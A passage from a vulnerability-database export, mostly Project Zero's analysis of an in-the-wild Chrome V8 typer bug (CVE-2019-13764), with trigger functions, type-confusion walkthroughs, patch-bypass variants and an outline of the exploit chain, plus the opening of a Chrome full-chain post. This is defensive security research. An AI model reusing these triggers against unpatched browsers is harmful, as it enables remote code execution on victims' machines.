"2022-03-23T04:42:58", "description": "https://googleprojectzero.blogspot.com/2019/04/virtually-unlimit...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-12-18T21:57:26", "type": "githubexploit", "title": "Exploit for CVE-2019-13768", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13768", "CVE-2019-5782", "CVE-2019-7582"], "modified": "2022-03-23T02:20:39", "id": "D5119FBA-40A2-5447-A4DA-EFDF665F9D0D", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "googleprojectzero": [{"lastseen": "2021-01-13T07:24:00", "description": "This is part 2 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the [introduction post](<https://googleprojectzero.blogspot.com/2021/01/introducing-in-wild-series.html>).\n\nPosted by Sergei Glazunov, Project Zero\n\nThis post only covers one of the exploits, specifically a renderer exploit targeting Chrome 73-78 on Android. We use it as an opportunity to talk about an interesting vulnerability class in Chrome\u2019s JavaScript engine.\n\n### Brief introduction to typer bugs\n\nOne of the features that make JavaScript code especially difficult to optimize is the dynamic type system. Even for a trivial expression like a + b the engine has to support a multitude of cases depending on whether the parameters are numbers, strings, booleans, objects, etc. JIT compilation wouldn\u2019t make much sense if the compiler always had to emit machine code that could handle every possible type combination for every JS operation. Chrome\u2019s JavaScript engine, V8, tries to overcome this limitation through type speculation. During the first several invocations of a JavaScript function, the interpreter records the type information for various operations such as parameter accesses and property loads. If the function is later selected to be JIT compiled, TurboFan, which is V8\u2019s newest compiler, makes an assumption that the observed types will be used in all subsequent calls, and propagates the type information throughout the whole function graph using the set of rules derived from the language specification. For example: if at least one of the operands to the addition operator is a string, the output is guaranteed to be a string as well; Math.random() always returns a number; and so on. The compiler also puts runtime checks for the speculated types that trigger deoptimization (i.e., revert to execution in the interpreter and update the type feedback) in case one of the assumptions no longer holds.\n\nFor integers, V8 goes even further and tracks the possible range of nodes. The main reason behind that is that even though the ECMAScript specification defines Number as the 64-bit floating point type, internally, TurboFan always tries to use the most efficient representation possible in a given context, which could be a 64-bit integer, 31-bit tagged integer, etc. Range information is also employed in other optimizations. For example, the compiler is smart enough to figure out that in the following code snippet, the branch can never be taken and therefore eliminate the whole if statement:\n\na = Math.min(a, 1);\n\nif (a > 2) {\n\nreturn 3;\n\n} \n \n--- \n \nNow, imagine there\u2019s an issue that makes TurboFan believe that the function vuln() returns a value in the range [0; 2] whereas its actual range is [0; 4]. Consider the code below:\n\na = vuln(a);\n\nlet array = [1, 2, 3];\n\nreturn array[a]; \n \n--- \n \nIf the engine has never encountered an out-of-bounds access attempt while running the code in the interpreter, it will instruct the compiler to transform the last line into a sequence that at a certain optimization phase, can be expressed by the following pseudocode:\n\nif (a >= array.length) {\n\ndeoptimize();\n\n}\n\nlet elements = array.[[elements]];\n\nreturn elements.get(a); \n \n--- \n \nget() acts as a C-style element access operation and performs no bounds checks. In subsequent optimization phases the compiler will discover that, according to the available type information, the length check is redundant and eliminate it completely. Consequently, the generated code will be able to access out-of-bounds data.\n\nThe bug class outlined above is the main subject of this blog post; and bounds check elimination is the most popular exploitation technique for this class. A textbook example of such a vulnerability is [the off-by-one issue in the typer rule for String.indexOf](<https://bugs.chromium.org/p/chromium/issues/detail?id=762874>) found by Stephen R\u00f6ttger.\n\nA typer vulnerability doesn\u2019t have to immediately result in an integer range miscalculation that would lead to OOB access because it\u2019s possible to make the compiler propagate the error. For example, if vuln() returns an unexpected boolean value, we can easily transform it into an unexpected integer:\n\na = vuln(a); // predicted = false; actual = true\n\na = a * 10; // predicted = 0; actual = 10\n\nlet array = [1, 2, 3];\n\nreturn array[a]; \n \n--- \n \nAnother [notable bug report](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1710>) by Stephen demonstrates that even a subtle mistake such as omitting negative zero can be exploited in the same fashion.\n\nAt a certain point, this vulnerability class became extremely popular as it immediately provided an attacker with an enormously powerful and reliable exploitation primitive. Fellow Project Zero member Mark Brand has used it in his [full-chain Chrome exploit](<https://googleprojectzero.blogspot.com/2019/04/virtually-unlimited-memory-escaping.html>). The bug class has made an appearance at several [CTFs](<https://www.jaybosamiya.com/blog/2019/01/02/krautflare/>) and [exploit competitions](<https://bugs.chromium.org/p/chromium/issues/detail?id=906043>). As a result, last year the V8 team issued [a hardening patch](<https://bugs.chromium.org/p/v8/issues/detail?id=8806>) designed to prevent attackers from abusing bounds check elimination. Instead of removing the checks, the compiler started marking them as \u201caborting\u201d, so in the worst case the attacker can only trigger a SIGTRAP.\n\n### Induction variable analysis\n\nThe renderer exploit we\u2019ve discovered takes advantage of an issue in a function designed to compute the type of [induction variables](<https://en.wikipedia.org/wiki/Induction_variable>). The slightly abridged source code below is taken from the [latest affected revision](<https://chromium.googlesource.com/v8/v8.git/+/0da7ca8781c6c7ec852bef845b72ca7f212cdc23/src/compiler/typer.cc>) of V8:\n\nType Typer::Visitor::TypeInductionVariablePhi(Node* node) {\n\n[...]\n\n// We only handle integer induction variables (otherwise ranges\n\n// do not apply and we cannot do anything).\n\nif (!initial_type.Is(typer_->cache_->kInteger) ||\n\n!increment_type.Is(typer_->cache_->kInteger)) {\n\n// Fallback to normal phi typing, but ensure monotonicity.\n\n// (Unfortunately, without baking in the previous type,\n\n// monotonicity might be violated because we might not yet have\n\n// retyped the incrementing operation even though the increment's\n\n// type might been already reflected in the induction variable\n\n// phi.)\n\nType type = NodeProperties::IsTyped(node)\n\n? NodeProperties::GetType(node)\n\n: Type::None();\n\nfor (int i = 0; i < arity; ++i) {\n\ntype = Type::Union(type, Operand(node, i), zone());\n\n}\n\nreturn type;\n\n}\n\n// If we do not have enough type information for the initial value\n\n// or the increment, just return the initial value's type.\n\nif (initial_type.IsNone() ||\n\nincrement_type.Is(typer_->cache_->kSingletonZero)) {\n\nreturn initial_type;\n\n}\n\n[...]\n\nInductionVariable::ArithmeticType arithmetic_type =\n\ninduction_var->Type();\n\ndouble min = -V8_INFINITY;\n\ndouble max = V8_INFINITY;\n\ndouble increment_min;\n\ndouble increment_max;\n\nif (arithmetic_type ==\n\nInductionVariable::ArithmeticType::kAddition) {\n\nincrement_min = increment_type.Min();\n\nincrement_max = increment_type.Max();\n\n} else {\n\nDCHECK_EQ(InductionVariable::ArithmeticType::kSubtraction,\n\narithmetic_type);\n\nincrement_min = -increment_type.Max();\n\nincrement_max = -increment_type.Min();\n\n}\n\nif (increment_min >= 0) {\n\n// increasing sequence\n\nmin = initial_type.Min();\n\nfor (auto bound : induction_var->upper_bounds()) {\n\nType bound_type = TypeOrNone(bound.bound);\n\n// If the type is not an integer, just skip the bound.\n\nif (!bound_type.Is(typer_->cache_->kInteger)) continue;\n\n// If the type is not inhabited, then we can take the initial\n\n// value.\n\nif (bound_type.IsNone()) {\n\nmax = initial_type.Max();\n\nbreak;\n\n}\n\ndouble bound_max = bound_type.Max();\n\nif (bound.kind == InductionVariable::kStrict) {\n\nbound_max -= 1;\n\n}\n\nmax = std::min(max, bound_max + increment_max);\n\n}\n\n// The upper bound must be at least the initial value's upper\n\n// bound.\n\nmax = std::max(max, initial_type.Max());\n\n} else if (increment_max <= 0) {\n\n// decreasing sequence\n\n[...]\n\n} else {\n\n// Shortcut: If the increment can be both positive and negative,\n\n// the variable can go arbitrarily far, so just return integer.\n\nreturn typer_->cache_->kInteger;\n\n}\n\n[...]\n\nreturn Type::Range(min, max, typer_->zone());\n\n} \n \n--- \n \nNow, imagine the compiler processing the following JavaScript code:\n\nfor (var i = initial; i < bound; i += increment) { [...] } \n \n--- \n \nIn short, when the loop has been identified as increasing, the lower bound of initial becomes the lower bound of i, and the upper bound is calculated as the sum of the upper bounds of bound and increment. There\u2019s a similar branch for decreasing loops, and a special case for variables that can be both increasing and decreasing. The loop variable is named phi in the method because TurboFan operates on an intermediate representation in the [static single assignment](<https://en.wikipedia.org/wiki/Static_single_assignment_form>) form.\n\nNote that the algorithm only works with integers, otherwise a more conservative estimation method is applied. However, in this context an integer refers to a rather special type, which isn\u2019t bound to any machine integer type and can be represented as a floating point value in memory. The type holds two unusual properties that have made the vulnerability possible:\n\n * +Infinity and -Infinity belong to it, whereas NaN and -0 don\u2019t.\n * The type is not closed under addition, i.e., adding two integers doesn\u2019t always result in an integer. Namely, +Infinity + -Infinity yields NaN.\n\nThus, for the following loop the algorithm infers (-Infinity; +Infinity) as the induction variable type, while the actual value after the first iteration of the loop will be NaN:\n\nfor (var i = -Infinity; i < 0; i += Infinity) { } \n \n--- \n \nThis one line is enough to trigger the issue. The exploit author has had to make only two minor changes: (1) parametrize increment in order to make the value of i match the future inferred type during initial invocations in the interpreter and (2) introduce an extra variable to ensure the loop eventually ends. As a result, after deobfuscation, the relevant part of the trigger function looks as follows:\n\nfunction trigger(argument) {\n\nvar j = 0;\n\nvar increment = 100;\n\nif (argument > 2) {\n\nincrement = Infinity;\n\n}\n\nfor (var i = -Infinity; i <= -Infinity; i += increment) {\n\nj++;\n\nif (j == 20) {\n\nbreak;\n\n}\n\n}\n\n[...] \n \n--- \n \nThe resulting type mismatch, however, doesn\u2019t immediately let the attacker run arbitrary code. Given that the previously widely used bounds check elimination technique is no longer applicable, we were particularly interested to learn how the attacker approached exploiting the issue. \n\n### Exploitation\n\nThe trigger function continues with a series of operations aimed at transforming the type mismatch into an integer range miscalculation, similarly to what would follow in the previous technique, but with the additional requirement that the computed range must be narrowed down to a single number. Since the discovered exploit targets mobile devices, the exact instruction sequence used in the exploit only works for ARM processors. For the ease of the reader, we've modified it to be compatible with x64 as well.\n\n[...]\n\n// The comments display the current value of the variable i, the type\n\n// inferred by the compiler, and the machine type used to store\n\n// the value at each step.\n\n// Initially:\n\n// actual = NaN, inferred = (-Infinity, +Infinity)\n\n// representation = double\n\ni = Math.max(i, 0x100000800);\n\n// After step one:\n\n// actual = NaN, inferred = [0x100000800; +Infinity)\n\n// representation = double\n\ni = Math.min(0x100000801, i);\n\n// After step two:\n\n// actual = -0x8000000000000000, inferred = [0x100000800, 0x100000801]\n\n// representation = int64_t\n\ni -= 0x1000007fa;\n\n// After step three:\n\n// actual = -2042, inferred = [6, 7]\n\n// representation = int32_t\n\ni >>= 1;\n\n// After step four:\n\n// actual = -1021, inferred = 3\n\n// representation = int32_t\n\ni += 10;\n\n// After step five:\n\n// actual = -1011, inferred = 13\n\n// representation = int32_t\n\n[...] \n \n--- \n \nThe first notable transformation occurs in step two. TurboFan decides that the most appropriate representation for i at this point is a 64-bit integer as the inferred range is entirely within int64_t, and emits the CVTTSD2SI instruction to convert the double argument. Since NaN doesn\u2019t fit in the integer range, the instruction returns the [\u201cindefinite integer value\u201d](<https://www.felixcloutier.com/x86/cvttss2si>) -0x8000000000000000. In the next step, the compiler determines it can use the even narrower int32_t type. It discards the higher 32-bit word of i, assuming that for the values in the given range it has the same effect as subtracting 0x100000000, and then further subtracts 0x7fa. The remaining two operations are straightforward; however, one might wonder why the attacker couldn\u2019t make the compiler derive the required single-value type directly in step two. The answer lies in the optimization pass called the constant-folding reducer.\n\nReduction ConstantFoldingReducer::Reduce(Node* node) {\n\nDisallowHeapAccess no_heap_access;\n\nif (!NodeProperties::IsConstant(node) && NodeProperties::IsTyped(node) &&\n\nnode->op()->HasProperty(Operator::kEliminatable) &&\n\nnode->opcode() != IrOpcode::kFinishRegion) {\n\nNode* constant = TryGetConstant(jsgraph(), node);\n\nif (constant != nullptr) {\n\nReplaceWithValue(node, constant);\n\nreturn Replace(constant);\n\n[...] \n \n--- \n \nIf the reducer discovered that the output type of the NumberMin operator was a constant, it would replace the node with a reference to the constant thus eliminating the type mismatch. That doesn\u2019t apply to the SpeculativeNumberShiftRight and SpeculativeSafeIntegerAdd nodes, which represent the operations in steps four and five while the reducer is running, because they both are capable of triggering deoptimization and therefore not marked as eliminable.\n\nFormerly, the next step would be to abuse this mismatch to optimize away an array bounds check. Instead, the attacker makes use of the incorrectly typed value to create a JavaScript array for which bounds checks always pass even outside the compiled function. Consider the following method, which attempts to optimize array constructor calls:\n\nReduction JSCreateLowering::ReduceJSCreateArray(Node* node) {\n\n[...]\n\n} else if (arity == 1) {\n\nNode* length = NodeProperties::GetValueInput(node, 2);\n\nType length_type = NodeProperties::GetType(length);\n\nif (!length_type.Maybe(Type::Number())) {\n\n// Handle the single argument case, where we know that the value\n\n// cannot be a valid Array length.\n\nelements_kind = GetMoreGeneralElementsKind(\n\nelements_kind, IsHoleyElementsKind(elements_kind)\n\n? HOLEY_ELEMENTS\n\n: PACKED_ELEMENTS);\n\nreturn ReduceNewArray(node, std::vector<Node*>{length}, *initial_map,\n\nelements_kind, allocation,\n\nslack_tracking_prediction);\n\n}\n\nif (length_type.Is(Type::SignedSmall()) && length_type.Min() >= 0 &&\n\nlength_type.Max() <= kElementLoopUnrollLimit &&\n\nlength_type.Min() == length_type.Max()) {\n\nint capacity = static_cast<int>(length_type.Max());\n\nreturn ReduceNewArray(node, length, capacity, *initial_map,\n\nelements_kind, allocation,\n\nslack_tracking_prediction);\n\n[...] \n \n--- \n \nWhen the argument is known to be an integer constant less than 16, the compiler inlines the array creation procedure and unrolls the element initialization loop. ReduceJSCreateArray doesn\u2019t rely on the constant-folding reducer and implements its own less strict equivalent that just compares the upper and lower bounds of the inferred type. Unfortunately, even after folding the function keeps using the original argument node. The folded value is employed during initialization of the backing store while the length property of the array is set to the original node. This means that if we pass the value we obtained at step five to the constructor, it will return an array with the negative length and backing store that can fit 13 elements. Given that bounds checks are implemented as unsigned comparisons, the \u0441rafted array will allow us to access data well past its end. In fact, any positive value bigger than its predicted version would work as well.\n\nThe rest of the trigger function is provided below:\n\n[...]\n\ncorrupted_array = Array(i);\n\ncorrupted_array[0] = 1.1;\n\nptr_leak_array = [wasm_module, array_buffer, [...],\n\nwasm_module, array_buffer];\n\nextra_array = [13.37, [...], 13.37, 1.234];\n\nreturn [corrupted_array, ptr_leak_array, extra_array];\n\n} \n \n--- \n \nThe attacker forces TurboFan to put the data required for further exploitation right next to the corrupted array and to use the double element type for the backing store as it\u2019s the most convenient type for dealing with out-of-bounds data in the V8 heap.\n\nFrom this point on, the exploit follows the same algorithm that public V8 exploits have been following for several years:\n\n 1. Locate the required pointers and object fields through pattern-matching.\n 2. Construct an arbitrary memory access primitive using an extra JavaScript array and ArrayBuffer.\n 3. Follow the pointer chain from a WebAssembly module instance to locate a writable and executable memory page.\n 4. Overwrite the body of a WebAssembly function inside the page with the attacker\u2019s payload.\n 5. Finally, execute it.\n\nThe contents of the payload, which is about half a megabyte in size, will be discussed in detail in a subsequent blog post.\n\nGiven that the vast majority of Chrome exploits we have seen at Project Zero come from either exploit competitions or VRP submissions, the most striking difference this exploit has demonstrated lies in its focus on stability and reliability. Here are some examples. Almost the entire exploit is executed inside a web worker, which means it has a separate JavaScript environment and runs in its own thread. This greatly reduces the chance of the garbage collector causing an accidental crash due to the inconsistent heap state. The main thread part is only responsible for restarting the worker in case of failure and passing status information to the attacker\u2019s server. The exploit attempts to further reduce the time window for GC crashes by ensuring that every corrupted field is restored to the original value as soon as possible. It also employs the OOB access primitive early on to verify the processor architecture information provided in the user agent header. Finally, the author has clearly aimed to keep the number of hard-coded constants to a minimum. Despite supporting a wide range of Chrome versions, the exploit relies on a single version-dependent offset, namely, the offset in the WASM instance to the executable page pointer.\n\n### Patch 1\n\nEven though there\u2019s evidence this vulnerability has been originally used as a 0-day, by the time we obtained the exploit, it had already been fixed. The issue was [reported to Chrome](<https://bugs.chromium.org/p/chromium/issues/detail?id=1028863>) by security researchers Soyeon Park and Wen Xu in November 2019 and was assigned CVE-2019-13764. The proof of concept provided in the report is shown below:\n\nfunction write(begin, end, step) {\n\nfor (var i = begin; i >= end; i += step) {\n\nstep = end - begin;\n\nbegin >>>= 805306382;\n\n}\n\n}\n\nvar buffer = new ArrayBuffer(16384);\n\nvar view = new Uint32Array(buffer);\n\nfor (let i = 0; i < 10000; i++) {\n\nwrite(Infinity, 1, view[65536], 1);\n\n} \n \n--- \n \nAs the reader can see, it\u2019s not the most straightforward way to trigger the issue. The code resembles fuzzer output, and the reporters confirmed that the bug had been found through fuzzing. Given the available evidence, we\u2019re fully confident that it was an independent discovery (sometimes referred to as a \"bug collision\").\n\nSince the proof of concept could only lead to a SIGTRAP crash, and the reporters hadn\u2019t demonstrated, for example, a way to trigger memory corruption, it was initially considered a low-severity issue by the V8 engineers, however, after an internal discussion, the V8 team raised the severity rating to high.\n\nIn the light of the in-the-wild exploitation evidence, we decided to give [the fix](<https://chromium.googlesource.com/v8/v8.git/+/b8b6075021ade0969c6b8de9459cd34163f7dbe1>), which had introduced an explicit check for the NaN case, a thorough examination:\n\n[...]\n\nconst bool both_types_integer =\n\ninitial_type.Is(typer_->cache_->kInteger) &&\n\nincrement_type.Is(typer_->cache_->kInteger);\n\nbool maybe_nan = false;\n\n// The addition or subtraction could still produce a NaN, if the integer\n\n// ranges touch infinity.\n\nif (both_types_integer) {\n\nType resultant_type =\n\n(arithmetic_type == InductionVariable::ArithmeticType::kAddition)\n\n? typer_->operation_typer()->NumberAdd(initial_type,\n\nincrement_type)\n\n: typer_->operation_typer()->NumberSubtract(initial_type,\n\nincrement_type);\n\nmaybe_nan = resultant_type.Maybe(Type::NaN());\n\n}\n\n// We only handle integer induction variables (otherwise ranges\n\n// do not apply and we cannot do anything).\n\nif (!both_types_integer || maybe_nan) {\n\n[...] \n \n--- \n \nThe code makes the assumption that the loop variable may only become NaN if the sum or difference of initial and increment is NaN. At first sight, it seems like a fair assumption. The issue arises from the fact that the value of increment can be changed from inside the loop, which isn\u2019t obvious from the exploit but demonstrated in the proof of concept sent to Chrome. The typer takes into account these changes and reflects them in increment\u2019s computed type. Therefore, the attacker can, for example, add negative increment to i until the latter becomes -Infinity, then change the sign of increment and force the loop to produce NaN once more, as demonstrated by the code below:\n\nvar increment = -Infinity;\n\nvar k = 0;\n\nfor (var i = 0; i < 1; i += increment) {\n\nif (i == -Infinity) {\n\nincrement = +Infinity;\n\n}\n\nif (++k > 10) {\n\nbreak;\n\n}\n\n} \n \n--- \n \nThus, to \u201crevive\u201d the entire exploit, the attacker only needs to change a couple of lines in trigger.\n\n### Patch 2\n\nThe discovered variant was [reported to Chrome](<https://bugs.chromium.org/p/chromium/issues/detail?id=1051017>) in February along with the exploitation technique found in the exploit. This time [the patch](<https://chromium.googlesource.com/v8/v8.git/+/a2e971c56d1c46f7c71ccaf33057057308cc8484>) took a more conservative approach and made the function bail out as soon as the typer detects that increment can be Infinity.\n\n[...]\n\n// If we do not have enough type information for the initial value or\n\n// the increment, just return the initial value's type.\n\nif (initial_type.IsNone() ||\n\nincrement_type.Is(typer_->cache_->kSingletonZero)) {\n\nreturn initial_type;\n\n}\n\n// We only handle integer induction variables (otherwise ranges do not\n\n// apply and we cannot do anything). Moreover, we don't support infinities\n\n// in {increment_type} because the induction variable can become NaN\n\n// through addition/subtraction of opposing infinities.\n\nif (!initial_type.Is(typer_->cache_->kInteger) ||\n\n!increment_type.Is(typer_->cache_->kInteger) ||\n\nincrement_type.Min() == -V8_INFINITY ||\n\nincrement_type.Max() == +V8_INFINITY) {\n\n[...] \n \n--- \n \nAdditionally, ReduceJSCreateArray [was updated](<https://chromium.googlesource.com/v8/v8.git/+/6516b1ccbe6f549d2aa2fe24510f73eb3a33b41a>) to always use the same value for both the length property and backing store capacity, thus rendering the reported exploitation technique useless.\n\nUnfortunately, the new patch contained an unintended change that introduced another security issue. If we look at [the source code](<https://chromium.googlesource.com/v8/v8.git/+/0da7ca8781c6c7ec852bef845b72ca7f212cdc23/src/compiler/typer.cc#845>) of TypeInductionVariablePhi before the patches, we find that it checks whether the type of increment is limited to the constant zero. In this case, it assigns the type of initial to the induction variable. The second patch moved the check above the line that ensures initial is an integer. In JavaScript, however, adding or subtracting zero doesn\u2019t necessarily preserve the type, for example:\n\n| \n\n| \n\n-0\n\n| \n\n+\n\n| \n\n0\n\n| \n\n=>\n\n| \n\n-0 \n \n---|---|---|---|---|---|--- \n \n| \n\n| \n\n[string]\n\n| \n\n-\n\n| \n\n0\n\n| \n\n=>\n\n| \n\n[number] \n \n| \n\n| \n\n[object]\n\n| \n\n+\n\n| \n\n0\n\n| \n\n=>\n\n| \n\n[string] \n \nAs a result, the patched function provides us with an even wider choice of possible \u201ctype confusions\u201d.\n\nIt was considered worthwhile to examine how difficult it would be to find a replacement for the ReduceJSCreateArray technique and exploit the new issue. The task turned out to be a lot easier than initially expected because we soon found [this excellent blog post](<https://doar-e.github.io/blog/2019/05/09/circumventing-chromes-hardening-of-typer-bugs/>) written by Jeremy Fetiveau, where he describes a way to bypass the initial bounds check elimination hardening. In short, depending on whether the engine has encountered an out-of-bounds element access attempt during the execution of a function in the interpreter, it instructs the compiler to emit either the CheckBounds or NumberLessThan node, and only the former is covered by the hardening. Consequently, the attacker just needs to make sure that the function attempts to access a non-existent array element in one of the first few invocations.\n\nWe find it interesting that even though this equally powerful and convenient technique has been publicly available since last May, the attacker has chosen to rely on their own method. It is conceivable that the exploit had been developed even before the blog post came out.\n\nOnce again, the technique requires an integer with a miscalculated range, so the revamped trigger function mostly consists of various type transformations:\n\nfunction trigger(arg) {\n\n// Initially:\n\n// actual = 1, inferred = any\n\nvar k = 0;\n\narg = arg | 0;\n\n// After step one:\n\n// actual = 1, inferred = [-0x80000000, 0x7fffffff]\n\narg = Math.min(arg, 2);\n\n// After step two:\n\n// actual = 1, inferred = [-0x80000000, 2]\n\narg = Math.max(arg, 1);\n\n// After step three:\n\n// actual = 1, inferred = [1, 2]\n\nif (arg == 1) {\n\narg = \"30\";\n\n}\n\n// After step four:\n\n// actual = string{30}, inferred = [1, 2] or string{30}\n\nfor (var i = arg; i < 0x1000; i -= 0) {\n\nif (++k > 1) {\n\nbreak;\n\n}\n\n}\n\n// After step five:\n\n// actual = number{30}, inferred = [1, 2] or string{30}\n\ni += 1;\n\n// After step six:\n\n// actual = 31, inferred = [2, 3]\n\ni >>= 1;\n\n// After step seven:\n\n// actual = 15, inferred = 1\n\ni += 2;\n\n// After step eight:\n\n// actual = 17, inferred = 3\n\ni >>= 1;\n\n// After step nine:\n\n// actual = 8, inferred = 1\n\nvar array = [0.1, 0.1, 0.1, 0.1];\n\nreturn [array[i], array];\n\n} \n \n--- \n \nThe mismatch between the number 30 and string \u201c30\u201d occurs in step five. The next operation is represented by the SpeculativeSafeIntegerAdd node. The typer is aware that whenever this node encounters a non-number argument, it immediately triggers deoptimization. Hence, all non-number elements of the argument type can be ignored. The unexpected integer value, which obviously doesn\u2019t cause the deoptimization, enables us to generate an erroneous range. Eventually, the compiler eliminates the NumberLessThan node, which is supposed to protect the element access in the last line, based on the observed range.\n\n### Patch 3\n\nSoon after we had identified the regression, the V8 team landed [a patch](<https://chromium.googlesource.com/v8/v8.git/+/68099bffaca0b4cfa10eb0178606aa55fd85d8ef>) that removed the vulnerable code branch. They also took a number of additional hardening measures, for example:\n\n * Extended [element access hardening](<https://chromium.googlesource.com/v8/v8.git/+/fa5fc748e53ad9d3ca44050d07659e858dbffd94>), which now prevents the abuse of NumberLessThan nodes.\n * Discovered and [fixed a similar problem](<https://chromium.googlesource.com/v8/v8.git/+/c85aa83087e7146281a95369cadf943ef78bf321>) with the elimination of MaybeGrowFastElements. Under certain conditions, this node, which may resize the backing store of a given array, is placed before StoreElement to ensure the array can fit the element. Consequently, the elimination of the node could allow an attacker to write data past the end of the backing store.\n * [Implemented a verifier](<https://chromium.googlesource.com/v8/v8.git/+/e440eda4ad9bfd8983c9896de574556e8eaee406>) for induction variables that validates the computed type against the more conservative regular phi typing.\n\nFurthermore, the V8 engineers have been working on [a feature](<https://chromium.googlesource.com/v8/v8.git/+/2e82ead865d088890bbfd14abfb22b8055b35394>) that allows TurboFan to insert runtime type checks into generated code. The feature should make fuzzing for typer issues much more efficient.\n\n### Conclusion\n\nThis blog post is meant to provide insight into the complexity of type tracking in JavaScript. The number of obscure rules and constraints an engineer has to bear in mind while working on the feature almost inevitably leads to errors, and, quite often even the slightest issue in the typer is enough to build a powerful and reliable exploit.\n\nAlso, the reader is probably familiar with the hypothesis of an enormous disparity between the state of public and private offensive security research. The fact that we\u2019ve discovered a rather sophisticated attacker who has exploited a vulnerability in the class that has been under the scrutiny of the wider security community for at least a couple of years suggests that there\u2019s nevertheless a certain overlap. Moreover, we were especially pleased to see a bug collision between a VRP submission and an in-the-wild 0-day exploit.\n\nThis is part 2 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To continue reading, see [In The Wild Part 3: Chrome Exploits](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-chrome-exploits.html>).\n", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-01-12T00:00:00", "type": "googleprojectzero", "title": "\nIn-the-Wild Series: Chrome Infinity Bug\n", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13764"], "modified": "2021-01-12T00:00:00", "id": "GOOGLEPROJECTZERO:3397E6EF67D4C71C395ED0244548698A", "href": "https://googleprojectzero.blogspot.com/2021/01/in-wild-series-chrome-infinity-bug.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-06T01:57:02", "description": "Posted by Mark Brand, Exploit Technique Archaeologist.\n\n## Introduction\n\nAfter discovering a [collection](<https://bugs.chromium.org/p/project-zero/issues/list?can=1&q=-status%3AInvalid+%22MojoJS%22+finder%3Amarkbrand&colspec=ID+Status+Restrict+Finder+Reported+Remaining+CVE+Vendor+Product+Summary&cells=ids>) of possible sandbox escape vulnerabilities in Chrome, it seemed worthwhile to [exploit](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1755#c3>) one of these issues as a full-chain exploit together with a renderer vulnerability to get a better understanding of the mechanics required for a modern Chrome exploit. Considering the available bugs, the most likely appeared to be [issue 1755](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1755>), a use-after-free with parallels to classic Javascript engine callback bugs. This is a good candidate because of the high level of control the attacker has both over the lifetime of the free\u2019d object, and over the timing of the later use of the object.\n\n** \n**\n\nApologies in advance for glossing over a lot of details about how the Mojo IPC mechanisms function - there\u2019ll hopefully be some future blogposts explaining in more detail how the current Chrome sandbox interfaces look, but there\u2019s a lot to explain!\n\n** \n**\n\nFor the rest of this blog post, we\u2019ll be considering the last stable 64-bit release of Desktop Chrome for Windows before this issue was fixed, 71.0.3578.98.\n\n## Getting started\n\nOne of the most interesting things that we noticed during our research into the Chrome Mojo IPC layer is that it\u2019s actually possible to make IPC calls directly from [Javascript](<https://chromium.googlesource.com/chromium/src/+/master/mojo/public/js/README.md>) in Chrome! Passing the command line flag \u2018--enable-blink-features=MojoJS\u2019 to Chrome will enable this - and we used this feature to implement a Mojo fuzzer, which found some of the bugs reported.\n\n** \n**\n\nKnowing about this feature, the cleanest way to implement a full Chrome chain would be to use a renderer exploit to enable these bindings in the running renderer, and then do our privilege elevation from Javascript!\n\n## Exploiting the renderer\n\n[_tsuro](<https://twitter.com/_tsuro>) happened to have been working on an exploit for CVE-2019-5782, a nice bug in the v8 typer that was discovered by [SOrryMybad](<https://twitter.com/S0rryMybad>) and used at the Tian Fu Cup. I believe they have an upcoming blog post on the issue, so I\u2019ll leave the details to them. \n\n** \n**\n\nThe bug resulted from incorrectly estimating the possible range of `arguments.length`; this can then be leveraged together with the (BCE) Bounds-Check-Elimination pass in the JIT. Exploitation is very similar to other typer bugs - you can find the exploit in \u2018many_args.js\u2019. Note that as a result of _tsuro\u2019s work, the v8 team [have removed the BCE optimisation ](<https://bugs.chromium.org/p/v8/issues/detail?id=8806>)to make it harder to exploit such issues in the typer!\n\n** \n**\n\nThe important thing here is that we\u2019ll need to have a stable exploit - in order to launch the sandbox escape, we need to enable the Mojo bindings; and the easiest way to do this needs us to reload the main frame, which will mean that any objects we leave in a 